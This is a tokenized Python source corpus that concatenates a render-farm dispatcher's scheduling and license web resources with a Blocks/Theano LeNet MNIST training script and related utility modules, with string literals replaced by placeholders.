toModifyElements ) <EOL> def mainLoop ( self ) : <EOL> '''<STR_LIT>''' <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> loopStartTime = time . time ( ) <EOL> prevTimer = loopStartTime <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleDate = loopStartTime <EOL> log . info ( "<STR_LIT>" ) <EOL> log . info ( "<STR_LIT>" ) <EOL> try : <EOL> self . threadPool . poll ( ) <EOL> except NoResultsPending : <EOL> pass <EOL> else : <EOL> log . info ( "<STR_LIT>" ) <EOL> pass <EOL> self . cycle += <NUM_LIT:1> <EOL> self . dispatchTree . updateCompletionAndStatus ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . updateRenderNodes ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . dispatchTree . validateDependencies ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . updateDB ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> assignments = self . computeAssignments ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> self . sendAssignments ( assignments ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> singletonstats . theStats . cycleCounts [ '<STR_LIT>' ] = len ( assignments ) <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> , len ( assignments ) ) ) <EOL> prevTimer = time . time ( ) <EOL> for renderNode in self . dispatchTree . renderNodes . values ( ) : <EOL> renderNode . releaseFinishingStatus ( ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> log . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> loopDuration = ( time . time ( ) - loopStartTime ) * <NUM_LIT:1000> <EOL> log . info ( "<STR_LIT>" % loopDuration ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . cycleTimers [ '<STR_LIT>' ] = time . time ( ) - loopStartTime <EOL> singletonstats . theStats . aggregate ( ) <EOL> def updateDB ( self ) : <EOL> if settings . DB_ENABLE : <EOL> self . pulidb . createElements ( self . dispatchTree . toCreateElements ) <EOL> self . pulidb . updateElements ( self . dispatchTree . toModifyElements ) <EOL> self . pulidb . archiveElements ( self . dispatchTree . toArchiveElements ) <EOL> self . dispatchTree . resetDbElements ( ) <EOL> def computeAssignments ( self ) : <EOL> '''<STR_LIT>''' <EOL> LOGGER = logging . getLogger ( '<STR_LIT>' ) <EOL> from . model . node import NoRenderNodeAvailable , NoLicenseAvailableForTask <EOL> if not any ( rn . isAvailable ( ) for rn in self . dispatchTree . renderNodes . values ( ) ) : <EOL> return [ ] <EOL> entryPoints = set ( [ poolShare . node for poolShare in self . dispatchTree . poolShares . values ( ) <EOL> if poolShare . node . status not in ( NODE_BLOCKED , NODE_DONE , NODE_CANCELED , NODE_PAUSED ) and poolShare . node . readyCommandCount > <NUM_LIT:0> and poolShare . node . name != '<STR_LIT>' ] ) <EOL> isRenderNodesAvailable = False <EOL> for pool , jobsIterator in groupby ( entryPoints , lambda x : x . mainPoolShare ( ) . pool ) : <EOL> renderNodesAvailable = set ( [ rn for rn in pool . renderNodes if rn . status not in [ RN_UNKNOWN , RN_PAUSED , RN_WORKING ] ] ) <EOL> if len ( renderNodesAvailable ) : <EOL> isRenderNodesAvailable = True <EOL> break <EOL> if not isRenderNodesAvailable : <EOL> return [ ] <EOL> prevTimer = time . time ( ) <EOL> entryPoints = sorted ( entryPoints , key = lambda node : node . mainPoolShare ( ) . pool ) <EOL> for pool , jobsIterator in groupby ( entryPoints , lambda x : x . mainPoolShare ( ) . pool ) : <EOL> jobsList = [ job for job in jobsIterator ] <EOL> onlineRenderNodes = set ( [ rn for rn in pool . renderNodes if rn . status not in [ RN_UNKNOWN , RN_PAUSED ] ] ) <EOL> nbOnlineRenderNodes = len ( onlineRenderNodes ) <EOL> l = jobsList [ : ] <EOL> for job in l : <EOL> if job . mainPoolShare ( ) . userDefinedMaxRN and job . mainPoolShare ( ) . maxRN not in [ - <NUM_LIT:1> , <NUM_LIT:0> ] : <EOL> jobsList . remove ( job ) <EOL> nbOnlineRenderNodes -= job . mainPoolShare ( ) . maxRN <EOL> if len ( jobsList ) == <NUM_LIT:0> : <EOL> continue <EOL> dkList = [ job . dispatchKey for job in jobsList ] <EOL> nbJobs = len ( jobsList ) <EOL> nbRNAssigned = <NUM_LIT:0> <EOL> dkMin = min ( dkList ) <EOL> dkPositiveList = map ( lambda x : x - dkMin + <NUM_LIT:1> , dkList ) <EOL> dkSum = sum ( dkPositiveList ) <EOL> jobsList = sorted ( jobsList , key = lambda x : x . id ) <EOL> jobsList = sorted ( jobsList , key = lambda x : x . dispatchKey , reverse = True ) <EOL> for dk , jobIterator in groupby ( jobsList , lambda x : x . dispatchKey ) : <EOL> jobs = [ job for job in jobIterator ] <EOL> dkPositive = dk - dkMin + <NUM_LIT:1> <EOL> updatedmaxRN = int ( round ( nbOnlineRenderNodes * ( dkPositive / float ( dkSum ) ) ) ) <EOL> for job in jobs : <EOL> job . mainPoolShare ( ) . maxRN = updatedmaxRN <EOL> nbRNAssigned += updatedmaxRN <EOL> unassignedRN = nbOnlineRenderNodes - nbRNAssigned <EOL> while unassignedRN > <NUM_LIT:0> : <EOL> for job in jobsList : <EOL> if unassignedRN <= <NUM_LIT:0> : <EOL> break <EOL> job . mainPoolShare ( ) . maxRN += <NUM_LIT:1> <EOL> unassignedRN -= <NUM_LIT:1> <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . assignmentTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> LOGGER . info ( "<STR_LIT>" , ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) <EOL> entryPoints = sorted ( entryPoints , key = lambda node : node . id ) <EOL> entryPoints = sorted ( entryPoints , key = lambda node : node . dispatchKey , reverse = True ) <EOL> userDefEntryPoints = ifilter ( lambda node : node . mainPoolShare ( ) . userDefinedMaxRN , entryPoints ) <EOL> standardEntryPoints = ifilter ( lambda node : not node . mainPoolShare ( ) . userDefinedMaxRN , entryPoints ) <EOL> scoredEntryPoints = chain ( userDefEntryPoints , standardEntryPoints ) <EOL> prevTimer = time . time ( ) <EOL> assignments = [ ] <EOL> for entryPoint in scoredEntryPoints : <EOL> if not any ( [ poolShare . hasRenderNodesAvailable ( ) for poolShare in entryPoint . poolShares . values ( ) ] ) : <EOL> continue <EOL> try : <EOL> for ( rn , com ) in entryPoint . dispatchIterator ( lambda : self . queue . qsize ( ) > <NUM_LIT:0> ) : <EOL> assignments . append ( ( rn , com ) ) <EOL> entryPoint . mainPoolShare ( ) . allocatedRN += <NUM_LIT:1> <EOL> rn . currentpoolshare = entryPoint . mainPoolShare ( ) <EOL> except NoRenderNodeAvailable : <EOL> pass <EOL> except NoLicenseAvailableForTask : <EOL> LOGGER . info ( "<STR_LIT>" % entryPoint . name ) <EOL> pass <EOL> assignmentDict = collections . defaultdict ( list ) <EOL> for ( rn , com ) in assignments : <EOL> assignmentDict [ rn ] . append ( com ) <EOL> if singletonconfig . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> singletonstats . theStats . assignmentTimers [ '<STR_LIT>' ] = time . time ( ) - prevTimer <EOL> LOGGER . info ( "<STR_LIT>" , ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) <EOL> return assignmentDict . items ( ) <EOL> def updateRenderNodes ( self ) : <EOL> for rendernode in self . dispatchTree . renderNodes . values ( ) : <EOL> rendernode . updateStatus ( ) <EOL> def sendAssignments ( self , assignmentList ) : <EOL> '''<STR_LIT>''' <EOL> def sendAssignment ( args ) : <EOL> rendernode , commands = args <EOL> failures = [ ] <EOL> for command in commands : <EOL> headers = { } <EOL> if not rendernode . idInformed : <EOL> headers [ "<STR_LIT>" ] = rendernode . id <EOL> root = command . task <EOL> ancestors = [ root ] <EOL> while root . parent : <EOL> root = root . parent <EOL> ancestors . append ( root ) <EOL> arguments = { } <EOL> environment = { <EOL> '<STR_LIT>' : command . task . user , <EOL> '<STR_LIT>' : unicode ( rendernode . usedRam [ command . id ] ) , <EOL> '<STR_LIT>' : unicode ( rendernode . usedCoresNumber [ command . id ] ) , <EOL> } <EOL> for ancestor in ancestors : <EOL> arguments . update ( ancestor . arguments ) <EOL> environment . update ( ancestor . environment ) <EOL> arguments . update ( command . arguments ) <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" % ( command . id , command . task . name , rendernode ) ) <EOL> commandDict = { <EOL> "<STR_LIT:id>" : command . id , <EOL> "<STR_LIT>" : str ( command . task . runner ) , <EOL> "<STR_LIT>" : arguments , <EOL> "<STR_LIT>" : command . task . validationExpression , <EOL> "<STR_LIT>" : command . task . name , <EOL> "<STR_LIT>" : "<STR_LIT>" % command . task . id , <EOL> "<STR_LIT>" : environment , <EOL> "<STR_LIT>" : command . runnerPackages , <EOL> "<STR_LIT>" : command . watcherPackages <EOL> } <EOL> body = json . dumps ( commandDict ) <EOL> headers [ "<STR_LIT>" ] = len ( body ) <EOL> headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> try : <EOL> resp , data = rendernode . request ( "<STR_LIT:POST>" , "<STR_LIT>" , body , headers ) <EOL> if not resp . status == <NUM_LIT> : <EOL> logging . getLogger ( '<STR_LIT>' ) . error ( "<STR_LIT>" , command . id , rendernode . name ) <EOL> failures . append ( ( rendernode , command ) ) <EOL> else : <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" , command . id , rendernode . name ) <EOL> except rendernode . RequestFailed , e : <EOL> logging . getLogger ( '<STR_LIT>' ) . error ( "<STR_LIT>" , command . id , rendernode . name , e ) <EOL> failures . append ( ( rendernode , command ) ) <EOL> return failures <EOL> requests = makeRequests ( sendAssignment , [ [ a , b ] for ( a , b ) in assignmentList ] , self . _assignmentFailed ) <EOL> for request in requests : <EOL> self . threadPool . putRequest ( request ) <EOL> def _assignmentFailed ( self , request , failures ) : <EOL> for assignment in failures : <EOL> rendernode , command = assignment <EOL> rendernode . clearAssignment ( command ) <EOL> command . clearAssignment ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" % ( command . id , rendernode . name ) ) <EOL> def handleNewGraphRequestApply ( self , graph ) : <EOL> '''<STR_LIT>''' <EOL> prevTimer = time . time ( ) <EOL> nodes = self . dispatchTree . registerNewGraph ( graph ) <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> for node in nodes : <EOL> try : <EOL> if node . tags [ '<STR_LIT>' ] == '<STR_LIT:true>' or node . tags [ '<STR_LIT>' ] == True : <EOL> node . setPaused ( True ) <EOL> except KeyError : <EOL> continue <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( "<STR_LIT>" % ( ( time . time ( ) - prevTimer ) * <NUM_LIT:1000> ) ) <EOL> prevTimer = time . time ( ) <EOL> logging . getLogger ( '<STR_LIT>' ) . info ( '<STR_LIT>' % graph [ '<STR_LIT:name>' ] ) <EOL> return nodes <EOL> def updateCommandApply ( self , dct ) : <EOL> '''<STR_LIT>''' <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> commandId = dct [ '<STR_LIT:id>' ] <EOL> renderNodeName = dct [ '<STR_LIT>' ] <EOL> try : <EOL> command = self . dispatchTree . commands [ commandId ] <EOL> except KeyError : <EOL> raise KeyError ( "<STR_LIT>" % commandId ) <EOL> if not command . renderNode : <EOL> raise KeyError ( "<STR_LIT>" % ( commandId , int ( dct [ '<STR_LIT:status>' ] ) , renderNodeName ) ) <EOL> elif command . renderNode . name != renderNodeName : <EOL> log . warning ( "<STR_LIT>" % ( renderNodeName , command . renderNode . name ) ) <EOL> raise KeyError ( "<STR_LIT>" % ( commandId , renderNodeName , command . renderNode . name ) ) <EOL> rn = command . renderNode <EOL> rn . lastAliveTime = max ( time . time ( ) , rn . lastAliveTime ) <EOL> if commandId not in rn . commands : <EOL> if len ( rn . commands ) == <NUM_LIT:0> and command . status is not enums . CMD_CANCELED : <EOL> rn . commands [ commandId ] = command <EOL> rn . reserveLicense ( command , self . licenseManager ) <EOL> log . warning ( "<STR_LIT>" % ( commandId , rn . name ) ) <EOL> if "<STR_LIT:status>" in dct : <EOL> command . status = int ( dct [ '<STR_LIT:status>' ] ) <EOL> if "<STR_LIT>" in dct and command . status == enums . CMD_RUNNING : <EOL> command . completion = float ( dct [ '<STR_LIT>' ] ) <EOL> command . message = dct [ '<STR_LIT:message>' ] <EOL> if "<STR_LIT>" in dct : <EOL> command . validatorMessage = dct [ '<STR_LIT>' ] <EOL> command . errorInfos = dct [ '<STR_LIT>' ] <EOL> if command . validatorMessage : <EOL> command . status = enums . CMD_ERROR <EOL> if "<STR_LIT>" in dct and dct [ "<STR_LIT>" ] is not None : <EOL> command . stats = dct [ "<STR_LIT>" ] <EOL> def queueWorkload ( self , workload ) : <EOL> self . queue . put ( workload ) </s>
<s> '''<STR_LIT>''' <EOL> from octopus . core . framework import ResourceNotFoundError <EOL> from octopus . dispatcher . webservice import DispatcherBaseResource <EOL> from octopus . core . communication . http import Http404 , Http500 <EOL> class LicensesResource ( DispatcherBaseResource ) : <EOL> def get ( self ) : <EOL> self . writeCallback ( repr ( self . dispatcher . licenseManager ) ) <EOL> class LicenseResource ( DispatcherBaseResource ) : <EOL> def get ( self , licenseName ) : <EOL> try : <EOL> lic = self . dispatcher . licenseManager . licenses [ licenseName ] <EOL> licenseRepr = "<STR_LIT>" % ( str ( lic . maximum ) , str ( lic . used ) ) <EOL> for rn in sorted ( lic . currentUsingRenderNodes ) : <EOL> licenseRepr += "<STR_LIT>" % rn . name <EOL> licenseRepr += "<STR_LIT>" <EOL> self . writeCallback ( licenseRepr ) <EOL> except KeyError : <EOL> raise ResourceNotFoundError <EOL> def put ( self , licenseName ) : <EOL> data = self . getBodyAsJSON ( ) <EOL> try : <EOL> maxLic = data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise Http404 ( "<STR_LIT>" ) <EOL> else : <EOL> self . dispatcher . licenseManager . setMaxLicensesNumber ( licenseName , maxLic ) <EOL> self . writeCallback ( "<STR_LIT:OK>" ) <EOL> def delete ( self , licenseName ) : <EOL> data = self . getBodyAsJSON ( ) <EOL> try : <EOL> rns = data [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise Http404 ( "<STR_LIT>" ) <EOL> else : <EOL> rnsList = rns . split ( "<STR_LIT:U+002C>" ) <EOL> for rnName in rnsList : <EOL> if rnName in self . dispatcher . dispatchTree . renderNodes : <EOL> rn = self . dispatcher . dispatchTree . renderNodes [ rnName ] <EOL> else : <EOL> raise Http500 ( "<STR_LIT>" % ( rnName ) ) <EOL> self . dispatcher . licenseManager . releaseLicenseForRenderNode ( licenseName , rn ) <EOL> self . writeCallback ( "<STR_LIT:OK>" ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import numpy <EOL> from argparse import ArgumentParser <EOL> from theano import tensor <EOL> from blocks . algorithms import GradientDescent , Scale <EOL> from blocks . bricks import ( MLP , Rectifier , Initializable , FeedforwardSequence , <EOL> Softmax , Activation ) <EOL> from blocks . bricks . conv import ( Convolutional , ConvolutionalSequence , <EOL> Flattener , MaxPooling ) <EOL> from blocks . bricks . cost import CategoricalCrossEntropy , MisclassificationRate <EOL> from blocks . extensions import FinishAfter , Timing , Printing , ProgressBar <EOL> from blocks . extensions . monitoring import ( DataStreamMonitoring , <EOL> TrainingDataMonitoring ) <EOL> from blocks . extensions . saveload import Checkpoint <EOL> from blocks . graph import ComputationGraph <EOL> from blocks . initialization import Constant , Uniform <EOL> from blocks . main_loop import MainLoop <EOL> from blocks . model import Model <EOL> from blocks . monitoring import aggregation <EOL> from fuel . datasets import MNIST <EOL> from fuel . schemes import ShuffledScheme <EOL> from fuel . streams import DataStream <EOL> from toolz . itertoolz import interleave <EOL> class LeNet ( FeedforwardSequence , Initializable ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , conv_activations , num_channels , image_shape , <EOL> filter_sizes , feature_maps , pooling_sizes , <EOL> top_mlp_activations , top_mlp_dims , <EOL> conv_step = None , border_mode = '<STR_LIT>' , ** kwargs ) : <EOL> if conv_step is None : <EOL> self . conv_step = ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> else : <EOL> self . conv_step = conv_step <EOL> self . num_channels = num_channels <EOL> self . image_shape = image_shape <EOL> self . top_mlp_activations = top_mlp_activations <EOL> self . top_mlp_dims = top_mlp_dims <EOL> self . border_mode = border_mode <EOL> conv_parameters = zip ( filter_sizes , feature_maps ) <EOL> self . layers = list ( interleave ( [ <EOL> ( Convolutional ( filter_size = filter_size , <EOL> num_filters = num_filter , <EOL> step = self . conv_step , <EOL> border_mode = self . border_mode , <EOL> name = '<STR_LIT>' . format ( i ) ) <EOL> for i , ( filter_size , num_filter ) <EOL> in enumerate ( conv_parameters ) ) , <EOL> conv_activations , <EOL> ( MaxPooling ( size , name = '<STR_LIT>' . format ( i ) ) <EOL> for i , size in enumerate ( pooling_sizes ) ) ] ) ) <EOL> self . conv_sequence = ConvolutionalSequence ( self . layers , num_channels , <EOL> image_size = image_shape ) <EOL> self . top_mlp = MLP ( top_mlp_activations , top_mlp_dims ) <EOL> self . flattener = Flattener ( ) <EOL> application_methods = [ self . conv_sequence . apply , self . flattener . apply , <EOL> self . top_mlp . apply ] <EOL> super ( LeNet , self ) . __init__ ( application_methods , ** kwargs ) <EOL> @ property <EOL> def output_dim ( self ) : <EOL> return self . top_mlp_dims [ - <NUM_LIT:1> ] <EOL> @ output_dim . setter <EOL> def output_dim ( self , value ) : <EOL> self . top_mlp_dims [ - <NUM_LIT:1> ] = value <EOL> def _push_allocation_config ( self ) : <EOL> self . conv_sequence . _push_allocation_config ( ) <EOL> conv_out_dim = self . conv_sequence . get_dim ( '<STR_LIT>' ) <EOL> self . top_mlp . activations = self . top_mlp_activations <EOL> self . top_mlp . dims = [ numpy . prod ( conv_out_dim ) ] + self . top_mlp_dims <EOL> def main ( save_to , num_epochs , feature_maps = None , mlp_hiddens = None , <EOL> conv_sizes = None , pool_sizes = None , batch_size = <NUM_LIT> , <EOL> num_batches = None ) : <EOL> if feature_maps is None : <EOL> feature_maps = [ <NUM_LIT:20> , <NUM_LIT:50> ] <EOL> if mlp_hiddens is None : <EOL> mlp_hiddens = [ <NUM_LIT> ] <EOL> if conv_sizes is None : <EOL> conv_sizes = [ <NUM_LIT:5> , <NUM_LIT:5> ] <EOL> if pool_sizes is None : <EOL> pool_sizes = [ <NUM_LIT:2> , <NUM_LIT:2> ] <EOL> image_size = ( <NUM_LIT> , <NUM_LIT> ) <EOL> output_size = <NUM_LIT:10> <EOL> conv_activations = [ Rectifier ( ) for _ in feature_maps ] <EOL> mlp_activations = [ Rectifier ( ) for _ in mlp_hiddens ] + [ Softmax ( ) ] <EOL> convnet = LeNet ( conv_activations , <NUM_LIT:1> , image_size , <EOL> filter_sizes = zip ( conv_sizes , conv_sizes ) , <EOL> feature_maps = feature_maps , <EOL> pooling_sizes = zip ( pool_sizes , pool_sizes ) , <EOL> top_mlp_activations = mlp_activations , <EOL> top_mlp_dims = mlp_hiddens + [ output_size ] , <EOL> border_mode = '<STR_LIT>' , <EOL> weights_init = Uniform ( width = <NUM_LIT> ) , <EOL> biases_init = Constant ( <NUM_LIT:0> ) ) <EOL> convnet . push_initialization_config ( ) <EOL> convnet . layers [ <NUM_LIT:0> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . layers [ <NUM_LIT:1> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . top_mlp . linear_transformations [ <NUM_LIT:0> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . top_mlp . linear_transformations [ <NUM_LIT:1> ] . weights_init = Uniform ( width = <NUM_LIT> ) <EOL> convnet . initialize ( ) <EOL> logging . info ( "<STR_LIT>" . format ( <EOL> * convnet . children [ <NUM_LIT:0> ] . get_dim ( '<STR_LIT>' ) ) ) <EOL> for i , layer in enumerate ( convnet . layers ) : <EOL> if isinstance ( layer , Activation ) : <EOL> logging . info ( "<STR_LIT>" . format ( <EOL> i , layer . __class__ . __name__ ) ) <EOL> else : <EOL> logging . info ( "<STR_LIT>" . format ( <EOL> i , layer . __class__ . __name__ , * layer . get_dim ( '<STR_LIT>' ) ) ) <EOL> x = tensor . tensor4 ( '<STR_LIT>' ) <EOL> y = tensor . lmatrix ( '<STR_LIT>' ) <EOL> probs = convnet . apply ( x ) <EOL> cost = ( CategoricalCrossEntropy ( ) . apply ( y . flatten ( ) , probs ) <EOL> . copy ( name = '<STR_LIT>' ) ) <EOL> error_rate = ( MisclassificationRate ( ) . apply ( y . flatten ( ) , probs ) <EOL> . copy ( name = '<STR_LIT>' ) ) <EOL> cg = ComputationGraph ( [ cost , error_rate ] ) <EOL> mnist_train = MNIST ( ( "<STR_LIT:train>" , ) ) <EOL> mnist_train_stream = DataStream . default_stream ( <EOL> mnist_train , iteration_scheme = ShuffledScheme ( <EOL> mnist_train . num_examples , batch_size ) ) <EOL> mnist_test = MNIST ( ( "<STR_LIT:test>" , ) ) <EOL> mnist_test_stream = DataStream . default_stream ( <EOL> mnist_test , <EOL> iteration_scheme = ShuffledScheme ( <EOL> mnist_test . num_examples , batch_size ) ) <EOL> algorithm = GradientDescent ( <EOL> cost = cost , parameters = cg . parameters , <EOL> step_rule = Scale ( learning_rate = <NUM_LIT:0.1> ) ) <EOL> extensions = [ Timing ( ) , <EOL> FinishAfter ( after_n_epochs = num_epochs , <EOL> after_n_batches = num_batches ) , <EOL> DataStreamMonitoring ( <EOL> [ cost , error_rate ] , <EOL> mnist_test_stream , <EOL> prefix = "<STR_LIT:test>" ) , <EOL> TrainingDataMonitoring ( <EOL> [ cost , error_rate , <EOL> aggregation . mean ( algorithm . total_gradient_norm ) ] , <EOL> prefix = "<STR_LIT:train>" , <EOL> after_epoch = True ) , <EOL> Checkpoint ( save_to ) , <EOL> ProgressBar ( ) , <EOL> Printing ( ) ] <EOL> model = Model ( cost ) <EOL> main_loop = MainLoop ( <EOL> algorithm , <EOL> mnist_train_stream , <EOL> model = model , <EOL> extensions = extensions ) <EOL> main_loop . run ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> parser = ArgumentParser ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT:2> , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , default = "<STR_LIT>" , nargs = "<STR_LIT:?>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , <EOL> default = [ <NUM_LIT:20> , <NUM_LIT:50> ] , help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , default = [ <NUM_LIT> ] , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , default = [ <NUM_LIT:5> , <NUM_LIT:5> ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , nargs = '<STR_LIT:+>' , default = [ <NUM_LIT:2> , <NUM_LIT:2> ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , type = int , default = <NUM_LIT> , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> main ( ** vars ( args ) ) </s>
<s> import numpy <EOL> def check_valid_permutation ( permutation ) : <EOL> """<STR_LIT>""" <EOL> permutation = numpy . asarray ( permutation ) <EOL> if permutation . ndim != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif permutation . dtype . kind != '<STR_LIT:i>' : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif ( len ( set ( permutation ) ) != max ( permutation ) + <NUM_LIT:1> or <EOL> min ( permutation ) < <NUM_LIT:0> ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return permutation </s>
<s> from __future__ import print_function <EOL> import logging <EOL> from abc import ABCMeta , abstractmethod <EOL> import progressbar <EOL> from six import add_metaclass <EOL> from toolz import first <EOL> logger = logging . getLogger ( __name__ ) <EOL> def callback ( func ) : <EOL> func . _is_callback = True <EOL> return func <EOL> class TrainingExtension ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None ) : <EOL> if not name : <EOL> name = self . __class__ . __name__ <EOL> self . name = name <EOL> @ property <EOL> def main_loop ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return self . _main_loop <EOL> @ main_loop . setter <EOL> def main_loop ( self , value ) : <EOL> self . _main_loop = value <EOL> def dispatch ( self , callback_name , * args ) : <EOL> """<STR_LIT>""" <EOL> getattr ( self , str ( callback_name ) ) ( * args ) <EOL> @ callback <EOL> def on_resumption ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def on_error ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def before_training ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def before_epoch ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def before_batch ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def after_batch ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def after_epoch ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def after_training ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ callback <EOL> def on_interrupt ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CallbackName ( str ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> callback_names = [ key for key , value <EOL> in TrainingExtension . __dict__ . items ( ) <EOL> if getattr ( value , '<STR_LIT>' , False ) ] <EOL> if other not in callback_names : <EOL> raise TypeError ( "<STR_LIT>" . format ( other ) ) <EOL> return str ( self ) == other <EOL> class Predicate ( object ) : <EOL> def __init__ ( self , condition , num ) : <EOL> self . condition = condition <EOL> self . num = num <EOL> def __call__ ( self , log ) : <EOL> if self . condition . endswith ( '<STR_LIT>' ) : <EOL> entry = log . status [ '<STR_LIT>' ] <EOL> else : <EOL> entry = log . status [ '<STR_LIT>' ] <EOL> if self . condition . startswith ( '<STR_LIT>' ) : <EOL> return entry % self . num == <NUM_LIT:0> <EOL> else : <EOL> return entry == self . num <EOL> def has_done_epochs ( log ) : <EOL> return log . status [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def always_true ( log ) : <EOL> return True <EOL> @ add_metaclass ( ABCMeta ) <EOL> class SimpleExtension ( TrainingExtension ) : <EOL> """<STR_LIT>""" <EOL> BOOLEAN_TRIGGERS = frozenset ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> INTEGER_TRIGGERS = frozenset ( [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . _conditions = [ ] <EOL> super_kwargs = { } <EOL> trigger_keywords = self . BOOLEAN_TRIGGERS | self . INTEGER_TRIGGERS <EOL> conditions = { } <EOL> for key , value in kwargs . items ( ) : 